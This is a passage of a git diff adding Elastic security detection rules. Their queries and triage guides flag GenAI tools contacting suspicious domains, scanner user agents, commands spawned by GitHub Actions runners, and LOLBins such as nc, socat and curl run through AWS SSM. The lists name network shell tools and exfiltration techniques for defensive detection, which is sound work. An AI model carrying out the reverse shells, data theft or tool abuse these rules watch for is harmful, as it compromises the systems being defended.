Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 214 + }, + "id": "a1329140-8de3-4445-9f87-908fb6d824f4_214", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-abcd-ef1234567890_1.json b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-abcd-ef1234567890_1.json new file mode 100644 index 00000000000..3f335dbe5f2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-abcd-ef1234567890_1.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when GenAI tools connect to domains using suspicious TLDs commonly abused for malware C2 infrastructure. TLDs like .top, .xyz, .ml, .cf, .onion are frequently used in phishing and malware campaigns. Legitimate GenAI services use well-established domains (.com, .ai, .io), so connections to suspicious TLDs may indicate compromised tools, malicious plugins, or AI-generated code connecting to attacker infrastructure.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "GenAI Process Connection to Suspicious Top Level Domain", + "note": "## Triage and analysis\n\n### Investigating GenAI Process Connection to Suspicious Top Level Domain\n\nThis rule detects GenAI tools connecting to domains with TLDs commonly abused by malware. The suspicious TLD filter makes this a high-signal rule with low expected volume.\n\n### Possible investigation steps\n\n- Review the GenAI process command line to identify which tool is running and verify if it's an expected/authorized tool.\n- Examine the network connection details (destination IP, port, protocol) to understand the nature of the communication.\n- Check the process execution chain to identify the full attack path and initial entry point.\n- Investigate the user account associated with the GenAI process to determine if this activity is expected for that user.\n- Review network traffic patterns to identify data exfiltration or command and control communications.\n- Check for other alerts or suspicious activity on the same host around the same time.\n- Verify if the GenAI tool is from a trusted source and if it's authorized for use in your environment.\n- Confirm whether the suspicious domain is used by package registries, CDN mirrors, or AI plugin repos.\n- Check if the GenAI tool attempted follow-up actions such as downloading scripts, connecting to IPs directly, or loading remote models.\n- Inspect whether the domain matches prompt-redirections, malicious AI plugins, or compromised package dependencies.\n\n### False positive analysis\n\n- Legitimate GenAI tools may occasionally connect to domains using suspicious TLDs if they're legitimate services.\n- Package managers (npx, pnpm, yarn, bunx) may connect to package registries or CDNs that use suspicious TLDs. Review and exclude known legitimate package registries if needed.\n- Some third-party AI plugin ecosystems (VSCode AI plugins, Cursor extensions) may download assets from unusual TLDs; verify allowlists.\n\n### Response and remediation\n\n- Terminate the GenAI process and any spawned child processes to stop the malicious activity.\n- Review and revoke any API keys, tokens, or credentials that may have been exposed or used by the GenAI tool.\n- Block the identified suspicious domains at the network level.\n- Investigate the GenAI tool configuration to identify how it was configured and what it was authorized to access.\n- Update security policies to restrict or monitor GenAI tool usage in the environment, especially for network communications.\n- Add detection for secondary indicators (reverse shells, encoded C2 traffic, odd user-agent strings).\n", + "query": "network where host.os.type in (\"macos\", \"windows\") and\n\n // GenAI processes\n process.name in (\n \"ollama.exe\", \"ollama\", \"Ollama\",\n \"textgen.exe\", \"textgen\", \"text-generation-webui.exe\", \"oobabooga.exe\",\n \"lmstudio.exe\", \"lmstudio\", \"LM Studio\",\n \"claude.exe\", \"claude\", \"Claude\",\n \"cursor.exe\", \"cursor\", \"Cursor\",\n \"copilot.exe\", \"copilot\", \"Copilot\",\n \"codex.exe\", \"codex\",\n \"Jan\", \"jan.exe\", \"jan\",\n \"gpt4all.exe\", \"gpt4all\", \"GPT4All\",\n \"gemini-cli.exe\", \"gemini-cli\",\n \"genaiscript.exe\", \"genaiscript\",\n \"grok.exe\", \"grok\",\n \"qwen.exe\", \"qwen\",\n \"koboldcpp.exe\", \"koboldcpp\", \"KoboldCpp\",\n \"llama-server\", \"llama-cli\",\n \"deno.exe\", \"deno\",\n \"npx\", \"pnpm\", \"yarn\", \"bunx\"\n ) and\n\n // Suspicious TLDs \n (\n // Windows DNS events\n (host.os.type == \"windows\" and dns.question.name != null and\n dns.question.name regex \"\"\".*\\.(top|buzz|xyz|rest|ml|cf|gq|ga|onion|monster|cyou|quest|cc|bar|cfd|click|cam|surf|tk|shop|club|icu|pw|ws|online|fun|life|boats|store|hair|skin|motorcycles|christmas|lol|makeup|mom|bond|beauty|biz|live|work|zip|country|accountant|date|party|science|loan|win|men|faith|review|racing|download|host)\"\"\") or\n\n // macOS network events\n (host.os.type == \"macos\" and destination.domain != null and\n destination.domain regex \"\"\".*\\.(top|buzz|xyz|rest|ml|cf|gq|ga|onion|monster|cyou|quest|cc|bar|cfd|click|cam|surf|tk|shop|club|icu|pw|ws|online|fun|life|boats|store|hair|skin|motorcycles|christmas|lol|makeup|mom|bond|beauty|biz|live|work|zip|country|accountant|date|party|science|loan|win|men|faith|review|racing|download|host)\"\"\")\n\n // Linux DNS events\n // Revist when available\n )\n", + "references": [ + "https://www.cybercrimeinfocenter.org/top-20-tlds-by-malicious-phishing-domains", + "https://atlas.mitre.org/techniques/AML.T0086", + "https://www.elastic.co/security-labs/elastic-advances-llm-security" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1b2c3d4-e5f6-7890-abcd-ef1234567890", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0086" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.004", + "name": "DNS", + "reference": "https://attack.mitre.org/techniques/T1071/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "a1b2c3d4-e5f6-7890-abcd-ef1234567890_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_2.json b/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_2.json new file mode 100644 index 00000000000..3a06fe3e62e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_2.json @@ -0,0 +1,153 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects unusual spikes in web server requests with uncommon or suspicious user-agent strings. Such activity may indicate reconnaissance attempts by attackers trying to identify vulnerabilities in web applications or servers. These user-agents are often associated with automated tools used for scanning, vulnerability assessment, or brute-force attacks.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Suspicious User Agent Requests", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Suspicious User Agent Requests\n\nThis rule flags surges of web requests that advertise scanner or brute-force tool user agents, signaling active reconnaissance against your web servers and applications. A common pattern is dirsearch or gobuster sweeping for hidden paths, firing hundreds of rapid GETs across diverse URLs from one host and probing admin panels, backup folders, and robots.txt.\n\n### Possible investigation steps\n\n- Verify whether the activity aligns with approved scanners or uptime checks by cross-referencing inventories, allowlists, change windows, and egress ranges; otherwise enrich the originating IP with ASN, geolocation, and threat reputation to gauge risk.\n- Sample representative requests to identify targeted paths and payloads (e.g., admin panels, .git/.env, backups, traversal, SQLi/XSS markers) and note any successful responses or downloads that indicate information exposure.\n- Analyze request rate, methods, and status-code distribution to separate noisy recon from successful discovery or brute-force patterns, highlighting any POST/PUT with nontrivial bodies.\n- Correlate the same client across hosts and security layers (application/auth logs, WAF/CDN, IDS) to determine whether it is scanning multiple services, triggering signatures, or attempting credential stuffing.\n- Assess user-agent authenticity and evasiveness by comparing HTTP header order/values and TLS fingerprints (JA3/JA4) to expected clients, and verify true client identity via forwarded-for headers if behind a proxy or CDN.\n\n### False positive analysis\n\n- Legitimate, scheduled vulnerability assessments by internal teams (e.g., Nessus, Nikto, or OpenVAS) can generate large volumes of requests with those user-agent strings across many paths.\n- Developer or QA testing using discovery/fuzzing or intercept-proxy tools (Dirsearch, Gobuster, Ffuf, Burp, or OWASP ZAP) may unintentionally target production hosts, producing a short-lived spike with diverse URLs.\n\n### Response and remediation\n\n- Immediately contain by blocking or rate-limiting the originating IPs at the WAF/CDN and edge firewall, and add temporary rules to drop or challenge requests that advertise tool user agents such as \"nikto\", \"sqlmap\", \"dirsearch\", \"wpscan\", \"gobuster\", or \"burp\".\n- If traffic is proxied (CDN/reverse proxy), identify the true client via forwarded headers and extend blocks at both layers, enabling bot management or JS challenges on swept paths like /admin, /.git, /.env, /backup, and common discovery endpoints.\n- Eradicate exposure by removing or restricting access to sensitive files and directories uncovered by the scans, rotating any credentials or API keys found, invalidating active sessions, and disabling public access to administrative panels until hardened.\n- Recover by verifying no unauthorized changes or data exfiltration occurred, tuning per-IP and per-path rate limits to prevent path-sweeps while preserving legitimate traffic, and reintroducing normal rules only after fixes are deployed and stability is confirmed.\n- Escalate to incident response if sensitive files are successfully downloaded (HTTP 200/206 on /.git, /.env, or backups), any login or account creation succeeds, multiple hosts or environments are targeted, or activity persists after blocking via UA spoofing or rapid IP rotation.\n- Harden long term by enforcing WAF signatures for known scanner UAs and path patterns, denying directory listing and direct access to /.git, /.env, /backup and similar artifacts, requiring MFA/VPN for /admin and management APIs, and deploying auto-ban controls like fail2ban or mod_security.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*\n\n| eval Esql.user_agent_original_to_lower = to_lower(user_agent.original), Esql.url_original_to_lower = to_lower(url.original)\n\n| where\n Esql.user_agent_original_to_lower like \"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/74.0.3729.169 safari/537.36\" or // Nikto\n Esql.user_agent_original_to_lower like \"nikto*\" or // Nikto\n Esql.user_agent_original_to_lower like \"mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)\" or // Nessus Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*nessus*\" or // Nessus Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"sqlmap/*\" or // SQLMap\n Esql.user_agent_original_to_lower like \"wpscan*\" or // WPScan\n Esql.user_agent_original_to_lower like \"feroxbuster/*\" or // Feroxbuster\n Esql.user_agent_original_to_lower like \"masscan*\" or // Masscan & masscan-ng\n Esql.user_agent_original_to_lower like \"fuzz*\" or // Ffuf\n Esql.user_agent_original_to_lower like \"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/user_agent.original like~ 87.0.4280.88 safari/537.36\" or // Dirsearch\n Esql.user_agent_original_to_lower like \"mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)\" or // Dirb\n Esql.user_agent_original_to_lower like \"dirbuster*\" or // Dirbuster\n Esql.user_agent_original_to_lower like \"gobuster/*\" or // Gobuster\n Esql.user_agent_original_to_lower like \"*dirsearch*\" or // dirsearch\n Esql.user_agent_original_to_lower like \"*nmap*\" or // Nmap Scripting Engine\n Esql.user_agent_original_to_lower like \"*hydra*\" or // Hydra Brute Forcer\n Esql.user_agent_original_to_lower like \"*w3af*\" or // w3af Web Application Attack and Audit Framework\n Esql.user_agent_original_to_lower like \"*arachni*\" or // Arachni Web Application Security Scanner\n Esql.user_agent_original_to_lower like \"*skipfish*\" or // Skipfish Web Application Security Scanner\n Esql.user_agent_original_to_lower like \"*openvas*\" or // OpenVAS Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*acunetix*\" or // Acunetix Vulnerability Scanner\n Esql.user_agent_original_to_lower like \"*zap*\" or // OWASP ZAP\n Esql.user_agent_original_to_lower like \"*burp*\" // Burp Suite\n\n| keep\n @timestamp,\n event.dataset,\n user_agent.original,\n source.ip,\n agent.id,\n host.name,\n Esql.url_original_to_lower,\n Esql.user_agent_original_to_lower,\n data_stream.namespace\n| stats\n Esql.event_count = count(),\n Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower),\n Esql.host_name_values = values(host.name),\n Esql.agent_id_values = values(agent.id),\n Esql.url_original_values = values(Esql.url_original_to_lower),\n Esql.user_agent_original_values = values(Esql.user_agent_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip, agent.id\n| where\n Esql.event_count > 50 and Esql.url_original_count_distinct > 10\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^2.0.0" + }, + { + "package": "apache", + "version": "^2.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.9.0" + }, + { + "package": "iis", + "version": "^1.21.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.url_original_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.001", + "name": "Scanning IP Blocks", + "reference": "https://attack.mitre.org/techniques/T1595/001/" + }, + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_110.json b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_110.json index 7197deb0f8d..10052f53eaf 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_110.json +++ b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_110.json @@ -25,7 +25,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/a640ef5b-e1da-4b17-8391-468fdbd1b517_1.json b/packages/security_detection_engine/kibana/security_rule/a640ef5b-e1da-4b17-8391-468fdbd1b517_1.json new file mode 100644 index 00000000000..47036ea03e9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a640ef5b-e1da-4b17-8391-468fdbd1b517_1.json @@ -0,0 +1,156 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potentially dangerous commands spawned by the GitHub Actions Runner.Worker process on self-hosted runner machines. Adversaries who gain the ability to modify or trigger workflows in a linked GitHub repository can execute arbitrary commands on the runner host. This behavior may indicate malicious or unexpected workflow activity, including code execution, file manipulation, or network exfiltration initiated through a compromised repository or unauthorized workflow.", + "false_positives": [ + "Authorized GitHub actions runner with no malicious workflow actions." + ], + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via GitHub Actions Runner", + "note": "## Triage and analysis\n\n### Investigating Execution via GitHub Actions Runner\n\nAdversaries who gain the ability to modify or trigger workflows in a linked GitHub repository can execute arbitrary commands on the runner host.\n\n### Possible investigation steps\n\n- Review the execution details like process.command_line and if it's expected or not.\n- Examine associated network and file activities and if there is any ingress tool transfer activity.\n- Verify if there is adjascent any sensitive file access or collection.\n- Correlate with other alerts and investiguate if this activity is related to a supply chain attack.\n\n### False positive analysis\n\n- Authorized github workflow actions.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement.\n- Terminate any suspicious child processes that were initiated by the Github actions runner.\n- Conduct a thorough review of the affected system's logs and configurations to identify any unauthorized changes or additional indicators of compromise.\n- Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed.\n- Implement application whitelisting to prevent unauthorized execution.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\n process.parent.name in (\"Runner.Worker\", \"Runner.Worker.exe\") and\n (\n process.name like (\"curl\", \"curl.exe\", \"wget\", \"wget.exe\", \"powershell.exe\", \"cmd.exe\", \"pwsh.exe\", \"certutil.exe\", \"rundll32.exe\", \"bash\", \"sh\", \"zsh\", \"tar\", \"rm\",\n \"sed\", \"osascript\", \"chmod\", \"nohup\", \"setsid\", \"dash\", \"ash\", \"tcsh\", \"csh\", \"ksh\", \"fish\", \"python*\", \"perl*\", \"ruby*\", \"lua*\", \"php*\", \"node\", \"node.exe\") or\n process.executable : (\"/tmp/*\", \"/private/tmp/*\", \"/var/tmp/*\", \"/dev/shm/*\", \"/run/*\", \"/var/run/*\", \"?:\\\\Users\\\\*\")\n )\n", + "references": [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a640ef5b-e1da-4b17-8391-468fdbd1b517", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Auditd Manager", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "a640ef5b-e1da-4b17-8391-468fdbd1b517_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd_1.json new file mode 100644 index 00000000000..358db5bb81c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd_1.json @@ -0,0 +1,209 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of Living Off the Land Binaries (LOLBins) or GTFOBins on EC2 instances via AWS Systems Manager (SSM) `SendCommand` API. This detection correlates AWS CloudTrail `SendCommand` events with endpoint process execution by matching SSM command IDs. While AWS redacts command parameters in CloudTrail logs, this correlation technique reveals the actual commands executed on EC2 instances. Adversaries may abuse SSM to execute malicious commands remotely without requiring SSH or RDP access, using legitimate system utilities for data exfiltration, establishing reverse shells, or lateral movement.", + "false_positives": [ + "Legitimate administrative tasks using SSM to run system utilities may trigger this rule. Review the command context, user identity, and timing to determine if the activity is authorized.", + "Automated configuration management or monitoring scripts that use LOLBins via SSM for legitimate purposes. Consider excluding known automation accounts or specific command patterns." + ], + "from": "now-9m", + "interval": "8m", + "language": "esql", + "license": "Elastic License v2", + "name": "AWS EC2 LOLBin Execution via SSM SendCommand", + "note": "## Triage and analysis\n\n### Investigating AWS EC2 LOLBin Execution via SSM SendCommand\n\nAWS Systems Manager (SSM) enables remote command execution on EC2 instances without SSH/RDP access. While legitimate for administration, adversaries exploit this by running LOLBins\u2014system utilities abused for malicious purposes like data theft or backdoors. This detection correlates CloudTrail API logs with endpoint telemetry using SSM command IDs, bypassing AWS's parameter redaction to reveal actual executed commands and identify suspicious activity.\n\nThis is an ESQL aggregation-based rule, thus all original event fields and detail may not be present in the alert. It is recommended to pivot into the raw events from both data sources for full context during investigation.\n\n### Possible investigation steps\n\n- Review the SSM command ID in the alert to track the full lifecycle of the command from initiation to execution across both CloudTrail and endpoint data\n- Examine the CloudTrail user identity, including the ARN and access key ID, to determine who initiated the SSM command and verify if the activity is authorized\n- Analyze the command lines of the executed LOLBins to understand what commands were run and assess their intent, looking for indicators of data exfiltration, reverse shells, or reconnaissance\n- Check the source IP address and user agent from the CloudTrail event to identify if the request came from an expected location or tool\n- Investigate the affected EC2 instances for other suspicious activities or signs of compromise during the same timeframe, including network connections and file modifications\n- Review the SSM shell process details to see the full context of what the SSM agent executed and identify the parent-child process relationships\n- Correlate the timing between the CloudTrail event and endpoint execution to ensure they occurred within the detection window and represent the same activity\n- Check if the same user identity or source IP has executed similar SSM commands on other EC2 instances in your environment\n\n### False positive analysis\n\n- Routine administrative scripts that use utilities like curl, wget, or python for legitimate configuration management should be documented and excluded by user identity or source IP\n- Automated monitoring tools that execute commands via SSM for health checks or data collection can be filtered by identifying their consistent patterns and access key IDs\n- DevOps CI/CD pipelines that deploy or test applications using SSM may trigger alerts; create exceptions based on known automation roles or specific command patterns\n- Security scanning tools that legitimately use SSM for vulnerability assessments should be allowlisted by their known IAM roles or source IPs\n- Scheduled maintenance tasks using LOLBins for backup, log rotation, or data synchronization can be excluded by command pattern matching or execution timing\n\n### Response and remediation\n\n- Immediately isolate the affected EC2 instance from the network to prevent further unauthorized command execution or lateral movement\n- Review AWS CloudTrail logs to identify the IAM user, role, or access key associated with the suspicious SSM command and revoke or rotate compromised credentials\n- Terminate any unauthorized processes identified on the endpoint that match the LOLBin execution patterns detected in the alert\n- Conduct a forensic analysis of the affected EC2 instance to identify any persistence mechanisms, backdoors, or data exfiltration indicators\n- Implement stricter IAM policies to limit SSM `SendCommand` permissions to only trusted users and roles, following the principle of least privilege\n- Enable multi-factor authentication (MFA) for IAM users with SSM execution privileges to reduce the risk of credential compromise\n- Review and update VPC security groups and network ACLs to restrict outbound traffic from EC2 instances to only necessary destinations, preventing data exfiltration\n- Escalate the incident to the security operations center (SOC) for further investigation and to determine if additional AWS resources or accounts have been compromised\n", + "query": "FROM logs-aws.cloudtrail*, logs-endpoint.events.process-* METADATA _id, _version, _index\n| WHERE\n // CloudTrail SSM SendCommand with AWS-RunShellScript\n (\n event.dataset == \"aws.cloudtrail\"\n AND event.action == \"SendCommand\"\n AND aws.cloudtrail.request_parameters LIKE \"*documentName=AWS-RunShellScript*\"\n )\n // Linux endpoint process events, prefiltered to SSM shell runner OR LOLBins/GTFOBins\n OR\n (\n event.dataset == \"endpoint.events.process\"\n AND host.os.type == \"linux\"\n AND (\n // SSM shell (_script.sh) runner\n process.command_line LIKE \"%/document/orchestration/%/awsrunShellScript/%/_script.sh\"\n // LOLBins / GTFOBins\n OR process.name IN (\n \"base64\",\n \"curl\",\n \"wget\",\n \"openssl\",\n \"nc\", \"ncat\", \"netcat\",\n \"socat\",\n \"python\", \"python3\",\n \"perl\",\n \"php\",\n \"ruby\",\n \"ssh\",\n \"scp\",\n \"sftp\",\n \"rsync\"\n )\n )\n )\n\n// Endpoint leg: extract SSM command ID from parent command line\n| DISSECT process.parent.command_line\n \"%{}/document/orchestration/%{Esql.process_parent_command_line_ssm_command_id}/%{}\"\n\n// CloudTrail leg: extract SSM command ID from response_elements\n| DISSECT aws.cloudtrail.response_elements\n \"%{}commandId=%{Esql.aws_cloudtrail_response_elements_ssm_command_id},%{}\"\n\n// Coalesce SSM command ID from both data sources\n| EVAL Esql.aws_ssm_command_id = COALESCE(\n Esql.aws_cloudtrail_response_elements_ssm_command_id,\n Esql.process_parent_command_line_ssm_command_id\n)\n| WHERE Esql.aws_ssm_command_id IS NOT NULL\n\n// Role flags\n| EVAL Esql.is_cloud_event = event.dataset == \"aws.cloudtrail\"\n| EVAL Esql.is_endpoint_event = event.dataset == \"endpoint.events.process\"\n\n// Identify the SSM shell processes (the _script.sh runners)\n| EVAL Esql.is_ssm_shell_process =\n Esql.is_endpoint_event\n AND process.command_line 